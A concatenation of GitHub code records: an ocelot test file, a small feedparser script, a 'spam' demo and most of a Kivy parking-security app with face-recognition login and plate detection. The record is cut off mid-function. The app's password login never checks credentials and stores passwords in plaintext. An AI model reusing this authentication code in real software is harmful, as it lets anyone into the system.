domain=\"[('membership','=',True)]\")\n # model_id = fields.Many2one(string=\"Model ID\", comodel_name=\"ir.model\")\n","repo_name":"Jeisonpernia/seaside_premier","sub_path":"sale_customer_requirements/models/sale_customer_requirements.py","file_name":"sale_customer_requirements.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19402871854","text":"from pathlib import Path\n\nimport numpy as np\nimport pytest\n\nfrom ocelot.cpbd.magnetic_lattice import MagneticLattice\nfrom ocelot.cpbd.transformations import SecondTM\nfrom ocelot.cpbd.optics import Navigator\nfrom ocelot.cpbd.track import ParameterScanner\nfrom ocelot.cpbd.io import ParameterScanFile\nfrom ocelot.cpbd.beam import ParticleArray\nfrom ocelot.cpbd.elements import Marker, SBend\n\nPARAMETER_NAME = \"pytest-param-name\"\nPARAMETER_VALUES = [0.3, 0.2]\nPARRAY0S = [ParticleArray(10), ParticleArray(20)]\nMARKER_NAMES = [\"pytest-marker-name-1\", \"pytest-marker-name-2\"]\nFILENAME = \"test.hdf5\"\n\ndef assert_parray_equality(first, second):\n np.testing.assert_equal(first.E, second.E)\n np.testing.assert_equal(first.s, second.s)\n np.testing.assert_equal(first.q_array, second.q_array)\n np.testing.assert_equal(first.rparticles, second.rparticles)\n\n@pytest.fixture\ndef pscanner_file(tmp_path):\n f = ParameterScanFile(tmp_path / FILENAME, \"w\")\n\n for pval, parray0 in zip(PARAMETER_VALUES, PARRAY0S):\n f.new_run_output(pval, parray0, MARKER_NAMES)\n yield f\n f.close()\n\ndef test_ParameterScannerFile_run_names(pscanner_file):\n assert pscanner_file.run_names == [\"run-0\", \"run-1\"]\n\ndef test_ParameterScannerFile_marker_names(pscanner_file):\n assert pscanner_file.marker_names == {\"pytest-marker-name-1\", \"pytest-marker-name-2\"}\n\ndef test_ParameterScannerFile_parameter_values(pscanner_file):\n assert pscanner_file.parameter_values == PARAMETER_VALUES\n\ndef test_ParameterScannerFile_write_parray0(pscanner_file):\n # Assuming len(parray1) == len(parray0)!\n parray0 = ParticleArray.random(10)\n pscanner_file.write_parray0(0, parray0)\n\n parray0_read = next(pscanner_file.parray0s())\n assert_parray_equality(parray0, 
parray0_read)\n\ndef test_ParameterScannerFile_write_parray1(pscanner_file):\n # Assuming len(parray1) == len(parray0)!\n parray1 = ParticleArray.random(10)\n pscanner_file.write_parray1(0, parray1)\n\n parray1_read = next(pscanner_file.parray1s())\n assert_parray_equality(parray1, parray1_read)\n\ndef test_ParameterScannerFile_write_marker(pscanner_file):\n marker_name = \"pytest-marker-name-1\"\n parray_marker = ParticleArray.random(10)\n pscanner_file.write_parray_marker(0, marker_name, parray_marker)\n\n parray_marker_read = next(pscanner_file.parray_markers(marker_name))\n assert_parray_equality(parray_marker, parray_marker_read)\n\ndef test_ParameterScannerFile_set_parameter_name(pscanner_file):\n new_name = \"Hello there\"\n pscanner_file.parameter_name = new_name\n assert pscanner_file.parameter_name == new_name\n\ndef test_ParameterScannerFile_next_run_name(pscanner_file):\n assert pscanner_file.next_run_name() == \"run-2\"\n\ndef test_ParameterScannerFile_filename(pscanner_file):\n assert Path(pscanner_file.filename).name == FILENAME\n\ndef test_ParameterScannerFile_init_from_parameter_scanner(tmp_path):\n\n b1 = SBend(l=0.5, angle=-0.5)\n cell = [Marker(MARKER_NAMES[0]), b1, Marker(MARKER_NAMES[1])]\n\n magnetic_lattice = MagneticLattice(cell, method={\"global\": SecondTM})\n\n with ParameterScanFile(tmp_path / FILENAME, \"w\") as f:\n pscanner = ParameterScanner(Navigator(magnetic_lattice),\n PARAMETER_VALUES,\n PARRAY0S,\n PARAMETER_NAME,\n [Marker(n) for n in MARKER_NAMES]\n )\n\n f.init_from_parameter_scanner(pscanner)\n\n parray0s = f.parray0s()\n assert_parray_equality(next(parray0s), PARRAY0S[0])\n assert_parray_equality(next(parray0s), PARRAY0S[1])\n assert f.parameter_name == PARAMETER_NAME\n assert f.parameter_values == PARAMETER_VALUES\n assert f.marker_names == set(MARKER_NAMES)\n","repo_name":"ocelot-collab/ocelot","sub_path":"unit_tests/cpbd/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"25791627235","text":"from collections import namedtuple\n\nimport feedparser\n\n# cached version to have predictable results for testing\nFEED_URL = \"http://bit.ly/2IkFe9B\"\n\nGame = namedtuple('Game', 'title link')\n\n\ndef get_games():\n \"\"\"Parses Steam's RSS feed and returns a list of Game namedtuples\"\"\"\n feeds = feedparser.parse(FEED_URL).entries\n result = []\n\n for item in feeds:\n data = Game(title=item.title, link=item.link)\n result.append(data)\n return result\n\nprint(get_games())","repo_name":"lotlordx/CodeGroffPy","sub_path":"feed_parser.py","file_name":"feed_parser.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74834295849","text":"#!/usr/bin/python\n\nimport random\n\nINGREDIENTS = ['egg', 'sausage', 'bacon', 'ham', 'crumpets', 'spam']\n\ndef prepare_menu_item(ingredient, with_spam=True):\n if with_spam:\n return 'spam ' + ingredient\n return ingredient\n\ndef main():\n print('Scene: A cafe. 
A man and his wife enter.')\n print('Man: Well, what\\'ve you got?')\n menu = []\n for ingredient in INGREDIENTS:\n has_spam = random.choice([True, False])\n menu.append(prepare_menu_item(ingredient, with_spam=has_spam))\n print('Waitress: Well, there\\'s', ', '.join(menu))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PacktPublishing/Mastering-Vim-Second-Edition","sub_path":"Chapter01/spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26995305392","text":"from kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen\r\nfrom kivy.core.window import Window\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.uix.popup import Popup\r\nimport sqlite3\r\nfrom kivy.lang import Builder\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport sys\r\nimport pytesseract\r\nimport pyttsx3\r\nfrom PIL import Image\r\n\r\nfrom utils import label_map_util\r\nfrom utils import visualization_utils as vis_util\r\nsys.path.append(\"..\")\r\n\r\npytesseract.pytesseract.tesseract_cmd ='C:/Program Files (x86)/Tesseract-OCR/tesseract.exe'\r\nMODEL_NAME = 'inference_graph'\r\nVIDEO_NAME = 'park.mp4'\r\nCWD_PATH = os.getcwd()\r\nPATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,'frozen_inference_graph.pb')\r\n\r\n\r\nPATH_TO_LABELS = os.path.join(CWD_PATH,'training','labelmap.pbtxt')\r\n\r\n\r\nPATH_TO_VIDEO = os.path.join(CWD_PATH,VIDEO_NAME)\r\n\r\n\r\nNUM_CLASSES = 1\r\n\r\n\r\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\r\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\r\ncategory_index = label_map_util.create_category_index(categories)\r\n\r\n\r\ndetection_graph = tf.Graph()\r\nwith detection_graph.as_default():\r\n od_graph_def = tf.GraphDef()\r\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\r\n serialized_graph = fid.read()\r\n od_graph_def.ParseFromString(serialized_graph)\r\n tf.import_graph_def(od_graph_def, name='')\r\n\r\n sess = tf.Session(graph=detection_graph)\r\n\r\n\r\nimage_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\r\n\r\n\r\ndetection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\r\n\r\n\r\ndetection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\r\ndetection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\r\n\r\nnum_detections = detection_graph.get_tensor_by_name('num_detections:0')\r\nWindow.clearcolor = (0.3, 0.3, 0.3, 0.3)\r\nBuilder.load_string('''\r\n:\r\n id: main_win\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n\r\n\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1,1)\r\n Rectangle:\r\n source:'work.jpg'\r\n size: root.width-350,root.height\r\n pos: self.pos\r\n\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"3RD EYE SECURITY SYSTEM\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: main_win.space_x, 10\r\n #spacing: 20\r\n Label:\r\n id: sp21\r\n\r\n\r\n Button:\r\n text: \"Login\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n 
background_normal: ''\r\n on_release:root.change_login()\r\n\r\n\r\n Label:\r\n id: sp2\r\n spacing:10\r\n\r\n Button:\r\n text :\"Sign In\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n size_hint_y: None\r\n height: 40\r\n background_color:(.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_signup()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"EXIT\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_press:app.stop()\r\n:\r\n id: roll\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n emaill:emaill\r\n pwdl:pwdl\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1,1)\r\n Rectangle:\r\n source:'work.jpg'\r\n size: root.width-350,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"LOG IN\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: roll.space_x, 10\r\n #spacing: 20\r\n BoxLayout:\r\n orientation: \"vertical\"\r\n spacing: 1\r\n size_hint_y: None\r\n height: 100\r\n Label:\r\n id:ws\r\n Label:\r\n id:ws1\r\n\r\n TextInput:\r\n id: emaill\r\n hint_text: \"EMail ID\"\r\n size_hint_y:None\r\n height:40\r\n focus:True\r\n multiline: False\r\n pos_hint:{'center_x': 1.25, 'center_y': 0}\r\n Label:\r\n id: info\r\n text: ''\r\n markup: True\r\n size_hint_y: None\r\n height: 20\r\n TextInput:\r\n id: pwdl\r\n hint_text: \"Password\"\r\n size_hint_y:None\r\n height:40\r\n focus:True\r\n multiline: False\r\n password:True\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n\r\n Label:\r\n id: sp\r\n size_hint_y: None\r\n height: 40\r\n Button:\r\n text: \"Done\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n on_release:root.change_mainmenu()\r\n\r\n\r\n Label:\r\n id: sp2\r\n Label:\r\n id :sp3\r\n Label:\r\n id :sp3\r\n Label:\r\n id :sp3\r\n Button:\r\n text :\"Go back\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n on_release:root.change_main()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n:\r\n id : logged\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n name:name\r\n email:email\r\n pwd:pwd\r\n phone:phone\r\n idd:idd\r\n spz:spz\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1,1)\r\n Rectangle:\r\n source:'work.jpg'\r\n size: root.width-350,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"SIGN IN\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: logged.space_x, 5\r\n #spacing: 20\r\n TextInput:\r\n id: name\r\n hint_text: \"Full Name\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n multiline: False\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:25\r\n TextInput:\r\n id: email\r\n hint_text: \"EMail ID\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.9}\r\n multiline: False\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:25\r\n TextInput:\r\n id: pwd\r\n hint_text: \"Password\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.7}\r\n multiline: False\r\n 
password:True\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:25\r\n TextInput:\r\n id: phone\r\n hint_text: \"Phone Number\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.5}\r\n multiline: False\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:25\r\n TextInput:\r\n id: idd\r\n hint_text: \"ID-Number\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n multiline: False\r\n\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:50\r\n Button:\r\n text: \"Continue\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.06,.45,.45, 1)\r\n background_normal: ''\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n on_release:root.change_mainmenu()\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:50\r\n Button:\r\n text: \"GO BACK\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_main()\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n Label:\r\n id: spz\r\n size_hint_y:None\r\n height:50\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:50\r\n:\r\n id: roll\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1, 1)\r\n Rectangle:\r\n source:'security.jpg'\r\n size: root.width,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"MAIN MENU\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: roll.space_x, 10\r\n #spacing: 20\r\n Button:\r\n text :\"Register Vehicle\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.register()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Delete Registered Vehicle\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.delete()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"View Known Cars in lot\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.moni()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"View Unknown Cars in lot\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.moni()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Detection on Video\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_video()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Dectection Of Images\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_picture()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"LOGOUT\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_main()\r\n\r\n:\r\n\r\n id: roll\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1, 1)\r\n Rectangle:\r\n source:'park.jpg'\r\n size: root.width,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n 
size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"PLAY THE VIDEO\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: roll.space_x, 10\r\n #spacing: 20\r\n Button:\r\n text :\"Open Video\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play()\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:50\r\n Button:\r\n text :\"Go Back\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.back()\r\n\r\n:\r\n\r\n id: roll\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1, 1)\r\n Rectangle:\r\n source:'security.jpg'\r\n size: root.width,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"IMAGE RECOGNITION\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: roll.space_x, 10\r\n #spacing: 20\r\n Button:\r\n text :\"Open Image 1\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play1()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Open Image 2\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play2()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Open Image 3\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play3()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Open Image 4\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play4()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Go Back\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.back()\r\n''')\r\n\r\n\r\nclass MainWindow(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def change_login(self):\r\n recognizer = cv2.face.LBPHFaceRecognizer_create()\r\n recognizer.read('train/trainningData.yml')\r\n faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml');\r\n id = -1\r\n cam = cv2.VideoCapture(0)\r\n cam.set(3, 640)\r\n cam.set(4, 480)\r\n minW = 0.1*cam.get(3)\r\n minH = 0.1*cam.get(4)\r\n while True:\r\n ret, img =cam.read()\r\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n faces = faceCascade.detectMultiScale(\r\n gray,\r\n scaleFactor = 1.2,\r\n minNeighbors = 5,\r\n minSize = (int(minW), int(minH)),\r\n )\r\n for(x,y,w,h) in faces:\r\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 2)\r\n id, confidence = recognizer.predict(gray[y:y+h,x:x+w])\r\n if (confidence < 75):\r\n id =id\r\n else:\r\n id =\"UNKNOWN\"\r\n cv2.imshow('camera',img)\r\n k = cv2.waitKey(30) & 0xff\r\n if k == 27:\r\n break\r\n cam.release()\r\n cv2.destroyAllWindows()\r\n comd=sqlite3.connect(\"security.db\")\r\n print(\"Opened database successfully\")\r\n cmd=\"SELECT * from Security_g\"\r\n cursor=comd.execute(cmd)\r\n isrecord=0\r\n print(id)\r\n for row in cursor:\r\n if str(id) in row :\r\n isrecord=1\r\n studdd = 1\r\n engine = pyttsx3.init()\r\n engine.say(\"Login Succesful\")\r\n engine.runAndWait()\r\n 
sa.screen_manager.current = 'four'\r\n \r\n if isrecord==0:\r\n engine = pyttsx3.init()\r\n engine.say(\"Sorry , You are not recognized\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'two'\r\n\r\n def change_signup(self):\r\n sa.screen_manager.current = 'three'\r\n\r\nclass pic(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n\r\n\r\n def play1(self):\r\n IMAGE_NAME = 'example1.jpg'\r\n PATH_TO_IMAGE = os.path.join(CWD_PATH,IMAGE_NAME)\r\n image = cv2.imread(PATH_TO_IMAGE)\r\n image_expanded = np.expand_dims(image, axis=0)\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_expanded})\r\n\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8,\r\n min_score_thresh=0.60)\r\n cv2.imshow('Object detector', image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n engine = pyttsx3.init()\r\n engine.say(\"Returning back to the main menu\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'four'\r\n\r\n def play2(self):\r\n IMAGE_NAME = 'example2.jpg'\r\n PATH_TO_IMAGE = os.path.join(CWD_PATH,IMAGE_NAME)\r\n image = cv2.imread(PATH_TO_IMAGE)\r\n image_expanded = np.expand_dims(image, axis=0)\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_expanded})\r\n\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8,\r\n min_score_thresh=0.60)\r\n cv2.imshow('Object detector', image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n sa.screen_manager.current = 'four'\r\n\r\n def play3(self):\r\n IMAGE_NAME = 'example3.jpg'\r\n PATH_TO_IMAGE = os.path.join(CWD_PATH,IMAGE_NAME)\r\n image = cv2.imread(PATH_TO_IMAGE)\r\n image_expanded = np.expand_dims(image, axis=0)\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_expanded})\r\n\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8,\r\n min_score_thresh=0.60)\r\n cv2.imshow('Object detector', image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n sa.screen_manager.current = 'four'\r\n def back(self):\r\n sa.screen_manager.current = 'four'\r\n \r\nclass Login(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def change_main(self):\r\n sa.screen_manager.current = 'one'\r\n\r\n def change_mainmenu(self):\r\n sa.screen_manager.current = 'four'\r\n\r\n\r\nclass Signup(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def change_main(self):\r\n sa.screen_manager.current = 'one'\r\n\r\n def change_mainmenu(self):\r\n l = []\r\n l.append(self.name.text)\r\n l.append(self.email.text)\r\n l.append(self.pwd.text)\r\n l.append(self.phone.text)\r\n l.append(self.idd.text)\r\n connection = sqlite3.connect(\"security.db\")\r\n crsr = connection.cursor()\r\n crsr.execute(\"INSERT INTO Security_g VALUES 
(?,?,?,?,?)\", l)\r\n connection.commit()\r\n connection.close()\r\n faceDetect=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n cam=cv2.VideoCapture(0)\r\n id=self.idd.text\r\n sampleno=0\r\n while(True):\r\n ret, img = cam.read()\r\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n faces = faceDetect.detectMultiScale(gray, 1.3, 5)\r\n for(x,y,w,h) in faces:\r\n sampleno+=1\r\n cv2.imwrite('dataset/user.'+str(id)+'.'+str(sampleno)+'.jpg',gray[y:y+h,x:x+w])\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)\r\n cv2.imshow(\"face\",img)\r\n cv2.waitKey(1)\r\n if sampleno>15:\r\n break\r\n cam.release() \r\n cv2.destroyAllWindows()\r\n recognizer=cv2.face.LBPHFaceRecognizer_create();\r\n path=\"C:/Tensorflow/models/research/object_detection/dataset\"\r\n\r\n def getImagesWithID(path):\r\n imagePaths=[os.path.join(path,f) for f in os.listdir(path)]\r\n faces=[]\r\n IDs=[]\r\n for imagePath in imagePaths:\r\n faceImg=Image.open(imagePath).convert('L')\r\n faceNp=np.array(faceImg,'uint8')\r\n a=imagePath.split('user')\r\n idd=int(a[1].split('.')[1])\r\n faces.append(faceNp)\r\n IDs.append(idd)\r\n cv2.imshow(\"training\",faceNp)\r\n cv2.waitKey(10)\r\n return np.array(IDs), faces\r\n Ids, faces = getImagesWithID(path)\r\n recognizer.train(faces, np.array(Ids))\r\n recognizer.save('train/trainningData.yml')\r\n cam.release() \r\n cv2.destroyAllWindows() \r\n sa.screen_manager.current = 'four'\r\n \r\n\r\n\r\nclass MainMenu(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def change_main(self):\r\n engine = pyttsx3.init()\r\n engine.say(\"Logout Successful\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'one'\r\n def change_video(self):\r\n engine = pyttsx3.init()\r\n engine.say(\"Number plate detection on video.\")\r\n engine.runAndWait()\r\n sa.screen_manager.current='five'\r\n\r\n def register(self):\r\n layout = BoxLayout(orientation='vertical')\r\n popupLabel = Label(text=\"Enter Car Number\")\r\n x = Label(text=\"\")\r\n self.text1 = TextInput(hint_text=\"Car Number\")\r\n popupLabel2 = Label(text=\"Enter Owner Name\")\r\n self.text2 = TextInput(hint_text=\"Owner Name\")\r\n popupLabel3 = Label(text=\"Enter Model Type\")\r\n self.text3 = TextInput(hint_text=\"Model Type\")\r\n popupLabel4 = Label(text=\"Enter Color Of the Car\")\r\n self.text4 = TextInput(hint_text=\"Color\")\r\n closeButton = Button(text=\"Register\")\r\n layout.add_widget(popupLabel)\r\n layout.add_widget(self.text1)\r\n layout.add_widget(popupLabel2)\r\n layout.add_widget(self.text2)\r\n layout.add_widget(popupLabel3)\r\n layout.add_widget(self.text3)\r\n layout.add_widget(popupLabel4)\r\n layout.add_widget(self.text4)\r\n layout.add_widget(x)\r\n layout.add_widget(closeButton)\r\n popup = Popup(title='Register Vehicle', content=layout, size_hint=(None, None), size=(400, 400))\r\n popup.open()\r\n closeButton.bind(on_press=self.regis)\r\n\r\n def regis(self, a):\r\n l = []\r\n l.append(self.text1.text)\r\n l.append(self.text2.text)\r\n l.append(self.text3.text)\r\n l.append(self.text4.text)\r\n connection = sqlite3.connect(\"security.db\")\r\n crsr = connection.cursor()\r\n crsr.execute(\"INSERT INTO Details VALUES (?,?,?,?)\", l)\r\n connection.commit()\r\n connection.close()\r\n engine = pyttsx3.init()\r\n engine.say(\"Vehicle is successfully registered!\")\r\n engine.runAndWait()\r\n\r\n def delete(self):\r\n layout = BoxLayout(orientation='vertical')\r\n w = Label(text=\"Enter Car Number\")\r\n x = Label(text=\"\")\r\n x1 = Label(text=\"\")\r\n x2 = 
